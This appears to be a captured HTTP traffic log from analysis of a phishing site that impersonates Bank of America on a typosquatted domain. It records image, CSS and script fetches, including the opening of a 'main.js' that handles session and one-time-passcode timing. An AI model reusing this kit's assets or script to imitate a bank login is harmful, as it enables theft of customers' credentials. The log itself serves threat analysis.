2e 35 39 68 32 2e 32 37 61 32 2e 36 32 20 32 2e 36 32 20 30 20 30 31 31 2e 32 39 2e 32 38 20 31 2e 38 33 20 31 2e 38 33 20 Data Ascii: <svg height="16" width="136" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 136 14.6"><defs><clipPath id="a"><path fill="none" d="M53.76 0H136v14.6H53.76z"/></clipPath></defs><path d="M0 12.3V5.59h2.27a2.62 2.62 0 011.29.28 1.83 1.83

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:43 UTC	860	OUT	GET /assets/gfootb-static-sprite.png HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:44 UTC	251	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:26:56 GMT ETag: "be1b-6118089398c00" Accept-Ranges: bytes Content-Length: 48667 Connection: close Content-Type: image/png
2025-01-15 16:43:44 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 32 08 06 00 00 00 6c f0 ea 07 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 35 71 b5 e3 36 00 00 01 88 70 72 56 57 78 9c ed 97 cd 51 c3 30 10 46 25 bc 31 eb 28 45 d0 02 e3 46 68 81 03 e2 9a 76 d4 0c 05 30 ea 85 0e 30 96 64 8d b0 31 c7 ec c2 f8 7b 93 1f 29 97 a7 6f 77 ed 71 de 3f df 3e cc d5 5c a7 69 8a 31 86 38 85 10 43 08 3e 44 ef e7 57 f0 de 8f 3e 8e 3e 8c e3 68 00 00 a0 c0 74 49 30 29 f9 89 b3 9f 58 c9 af 99 3f 65 27 b6 96 2c 95 a5 b0 3f 65 67 9a ed d6 96 a5 a0 bb f4 7d f5 53 e9 83 50 11 4a df 95 fc 94 ec 3b a6 5c 14 Data Ascii: PNGIHDR2lsBIT\|dpHYs~tEXtSoftwareAdobe Fireworks CS5q6prVWxQ0F%1(EFhv00d1{)owq?>\i18C>DW>>htI0)X?e',?eg}SPJ;\
2025-01-15 16:43:44 UTC	16384	IN	Data Raw: fa 6e 5e a7 7d 81 b6 ef 5a e6 f8 0f ba 79 44 9e eb 97 f3 cf ec b7 f3 35 e8 88 e9 ff e7 58 c9 7f a5 ff 57 76 f0 f4 a5 a7 4f 1d 1b 29 ed 22 fb b1 63 30 ce 1c cb 76 59 e0 93 d8 c5 0b 0c ff e7 5a f2 ef 7c 7e e0 b9 5f 25 2f cf 05 2c ce f4 7f 70 5c 80 cb c9 b9 79 ce b0 e7 5a f2 2f d0 c9 e9 3b 2f 78 86 17 d6 e1 ce 73 f5 fc 5f e9 06 b7 39 3f ff 1d ab 50 cc dc af 35 dd bb 5c ed 5b bd e3 79 7c de d9 02 18 c3 e7 f5 c4 8d 38 9d d4 cf dd f8 9f 67 00 e4 fb bf cb ca b1 4c 7b e4 3f 0c c3 30 0c c3 30 0c e7 18 5f e0 6b 33 be c0 e7 86 3e b4 92 e3 f8 02 9f 1b db dc c6 17 f8 7a e4 1a ab c9 f8 02 5f 83 9d fc c7 17 f8 fc 5c 53 fe e3 0b 7c 3c ae 29 ff 62 7c 81 8f c5 ca e7 37 be c0 61 18 86 61 18 86 61 78 6e 2e b5 95 74 eb 86 1c 61 7f 12 3f 6c c4 f7 5e 43 e3 95 df 11 76 6b ad ac Data Ascii: n^}ZyD5XWvO)"c0vYZ\|~_%/,p\yZ/;/xs_9?P5\[y\|8gL{?00_k3>z_\S\|<)b\|7aaaxn.ta?l^Cvk
2025-01-15 16:43:44 UTC	15899	IN	Data Raw: 8b 33 7a 0e 8b 81 8a 80 30 08 7f b0 16 ae 10 c1 63 38 a8 52 a3 ea 47 b1 a2 67 1f 9b 30 e0 f6 13 0c 02 a6 54 97 55 eb 1a f8 f2 84 bd bb 04 8b 9d 77 ad 22 2f 34 b3 de d6 8f 8f f7 bf be ee 43 be 51 60 5b 05 7b 4f b3 93 04 ba 63 c8 6e af 5d 95 03 b6 2b 95 7b db 7b ad e7 bc de d5 ce 0b 4e 11 21 81 33 95 81 3c ae de c7 56 ed 82 ec 79 78 e9 2c 21 43 0a e6 99 62 b2 2e a0 ea 08 6c 66 d6 d7 e5 c1 f8 27 0e 84 d2 c1 5c 20 d7 9f ce cf ed e3 eb 67 75 2c 10 ce bc b7 b8 9a 77 2d 2f 16 f4 df 33 db a5 f9 ba f1 ed 4e b0 ed e2 58 28 9b 63 0d 83 8e d3 e2 6f f5 4d 11 44 f0 91 73 ca 19 a2 61 b7 23 fc 23 30 7b 63 0d c1 c8 c0 f0 25 b5 75 44 57 43 42 01 13 a5 5a 80 41 e9 cd 5a 36 bb 2c d8 8f e7 fb 78 fd 0b 28 5a 25 87 b1 b5 d8 e7 77 80 d1 c0 e1 8a 48 62 06 68 54 62 32 f9 fe 3c 24 Data Ascii: 3z0c8RGg0TUw"/4CQ`[{Ocn]+{{N!3<Vyx,!Cb.lf'\ gu,w-/3NX(coMDsa##0{c%uDWCBZAZ6,x(Z%wHbhTb2<$

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:44 UTC	801	OUT	GET /assets/special/js/main.js HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:44 UTC	286	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 29 Jul 2024 18:01:08 GMT ETag: "20c8-61e66a545ecf2" Accept-Ranges: bytes Content-Length: 8392 Vary: Accept-Encoding Connection: close Content-Type: application/javascript
2025-01-15 16:43:44 UTC	8392	IN	Data Raw: 76 61 72 20 6f 74 70 5f 74 69 6d 65 6f 75 74 3d 34 65 34 3b 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 3d 6d 61 6b 65 69 64 28 35 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 73 65 73 73 69 6f 6e 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 3b 76 61 72 20 6f 6e 53 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 73 65 73 73 69 6f 6e 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 21 3d 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 26 26 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 6d 75 6c 74 69 74 61 62 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 2c 22 6d 75 6c 74 69 74 61 62 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 26 26 65 2e 6e 65 77 56 61 6c 75 Data Ascii: var otp_timeout=4e4;window.session=makeid(5),localStorage.setItem("session",window.session);var onStorage=function(e){"session"===e.key&&e.newValue!==window.session&&localStorage.setItem("multitab",window.session),"multitab"===e.key&&e.newValue&&e.newValu

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:44 UTC	855	OUT	GET /assets/BofA_rgb.png HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:44 UTC	251	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:02:46 GMT ETag: "99fe-6118032cc4d80" Accept-Ranges: bytes Content-Length: 39422 Connection: close Content-Type: image/png
2025-01-15 16:43:45 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 f0 00 00 00 aa 08 06 00 00 00 e2 17 6e 41 00 00 00 09 70 48 59 73 00 00 17 12 00 00 17 12 01 67 9f d2 52 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b Data Ascii: PNGIHDRnApHYsgROiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K
2025-01-15 16:43:45 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:
2025-01-15 16:43:45 UTC	6654	IN	Data Raw: 31 a2 8d 76 bd 87 9f 82 1e ca 67 67 66 02 87 e1 a7 c0 e5 99 a8 be 40 14 b3 81 43 81 19 1e db 3c 08 3f ab 66 ca c9 44 cf 2f 75 2b 06 b0 cf 9d f0 9b ea 67 94 4e a3 5c db 8f e8 83 f9 d3 3d bc 54 fb 18 d0 ef e5 5e 4a f2 ec b1 94 5f 66 ee 75 2f b1 22 e5 ec 33 e0 0c 60 15 ac 1e d7 5d 58 70 51 e2 e3 7b 55 cf ea ea d2 26 d9 10 ab cb 15 d5 d0 0c 3c 2b 74 73 fb 23 e5 eb 55 60 3d e0 5a 92 09 a6 3f 04 74 c7 06 74 b3 6e 4b 2c 06 17 6a fc ec 25 77 6c ff ae fb 6e bc 9a a7 f0 99 bb 02 1f 34 f1 6f da bb 8b 6f 57 2c c0 ed 33 9d 42 7f ac 42 f6 fd 19 38 1e ab 01 9b 79 68 c7 47 0a 9c 11 44 9f ed dd 1b cb dd fe b3 2e 35 de 04 ae c6 f2 a6 47 d1 1a b8 11 5b dd d0 a0 6e 2d c9 07 c0 c5 c0 df 3c b6 79 23 56 f0 51 b3 a6 7f ff 22 ed 6b f6 c0 7a 01 ec ef 7a 31 f4 9f e4 97 8f c1 fc 7f Data Ascii: 1vggf@C<?fD/u+gN\=T^J_fu/"3`]XpQ{U&<+ts#U`=Z?ttnK,j%wln4ooW,3BB8yhGD.5G[n-<y#VQ"kzz1

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:44 UTC	861	OUT	GET /assets/fsd-secure-esp-sprite.png HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:45 UTC	248	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:19:56 GMT ETag: "1d9-611807030db00" Accept-Ranges: bytes Content-Length: 473 Connection: close Content-Type: image/png
2025-01-15 16:43:45 UTC	473	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 25 08 06 00 00 00 76 d6 08 19 00 00 01 a0 49 44 41 54 38 cb ed 94 39 8b 42 31 14 85 f3 53 15 f7 7d 43 41 11 51 10 4b b1 d2 3f 61 63 63 21 d8 d8 58 08 56 36 96 62 23 2a 8a e2 be 9d e1 5c cd d3 61 a6 98 14 af 9b c0 79 4b 92 2f f7 dc fb f2 a2 1e 8f 07 6e b7 1b 8e c7 23 a6 d3 29 da ed 36 ba dd 2e 26 93 09 74 db ef f7 b8 df ef 7c 54 8a d7 ed 76 8b 56 ab 85 5c 2e 07 bf df 2f 8a c7 e3 68 36 9b 38 9d 4e e0 a2 af a6 d4 66 b3 41 a7 d3 41 22 91 40 24 12 41 bd 5e 47 a3 d1 80 d7 eb 45 34 1a c5 70 38 14 07 16 40 2b d5 6a 15 c9 64 12 fd 7e 1f 5c 80 16 7a bd 9e f4 d5 6a b5 9f 40 20 10 10 1b ab d5 0a d7 eb 55 46 16 8b 05 1c 0e 07 5c 2e 17 0e 87 c3 1b 58 af d7 28 14 0a 28 95 4a 92 38 3d 5f 2e 17 ec 76 3b Data Ascii: PNGIHDR%vIDAT89B1S}CAQK?acc!XV6b#*\ayK/n#)6.&t\|TvV\./h68NfAA"@$A^GE4p8@+jd~\zj@ UF\.X((J8=_.v;

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:44 UTC	851	OUT	GET /assets/help-qm-fsd.png HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:45 UTC	249	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:25:08 GMT ETag: "c94-6118082c99900" Accept-Ranges: bytes Content-Length: 3220 Connection: close Content-Type: image/png
2025-01-15 16:43:45 UTC	3220	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b Data Ascii: PNGIHDRapHYs~OiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:44 UTC	820	OUT	GET /assets/vipaa-v4-jawr-print.css HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:45 UTC	272	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 13:37:06 GMT ETag: "26e1-6117fd701c480" Accept-Ranges: bytes Content-Length: 9953 Vary: Accept-Encoding Connection: close Content-Type: text/css
2025-01-15 16:43:45 UTC	9953	IN	Data Raw: 2e 6f 6c 62 2d 70 6f 70 75 70 2d 63 6f 6e 74 65 6e 74 2d 6d 6f 64 75 6c 65 20 2e 73 74 61 6e 64 61 72 64 2d 70 72 69 6e 74 2d 6f 6c 62 2d 73 6b 69 6e 20 2e 70 6f 70 75 70 2d 68 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 35 70 78 20 30 20 31 35 70 78 3b 68 65 69 67 68 74 3a 35 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 34 30 30 31 61 7d 2e 6f 6c 62 2d 70 6f 70 75 70 2d 63 6f 6e 74 65 6e 74 2d 6d 6f 64 75 6c 65 20 2e 73 74 61 6e 64 61 72 64 2d 70 72 69 6e 74 2d 6f 6c 62 2d 73 6b 69 6e 20 2e 70 6f 70 75 70 2d 68 65 61 64 65 72 20 2e 63 6c 6f 73 65 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 30 20 30 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6f 6c 62 2d 70 6f 70 Data Ascii: .olb-popup-content-module .standard-print-olb-skin .popup-header{padding:10px 25px 0 15px;height:50px;background-color:#d4001a}.olb-popup-content-module .standard-print-olb-skin .popup-header .close-link{padding:2px 0 0;float:right;font-size:11px}.olb-pop

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:45 UTC	570	OUT	GET /assets/special/js/main.js HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:46 UTC	286	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 29 Jul 2024 18:01:08 GMT ETag: "20c8-61e66a545ecf2" Accept-Ranges: bytes Content-Length: 8392 Vary: Accept-Encoding Connection: close Content-Type: application/javascript
2025-01-15 16:43:46 UTC	8392	IN	Data Raw: 76 61 72 20 6f 74 70 5f 74 69 6d 65 6f 75 74 3d 34 65 34 3b 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 3d 6d 61 6b 65 69 64 28 35 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 73 65 73 73 69 6f 6e 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 3b 76 61 72 20 6f 6e 53 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 73 65 73 73 69 6f 6e 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 21 3d 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 26 26 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 6d 75 6c 74 69 74 61 62 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 2c 22 6d 75 6c 74 69 74 61 62 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 26 26 65 2e 6e 65 77 56 61 6c 75 Data Ascii: var otp_timeout=4e4;window.session=makeid(5),localStorage.setItem("session",window.session);var onStorage=function(e){"session"===e.key&&e.newValue!==window.session&&localStorage.setItem("multitab",window.session),"multitab"===e.key&&e.newValue&&e.newValu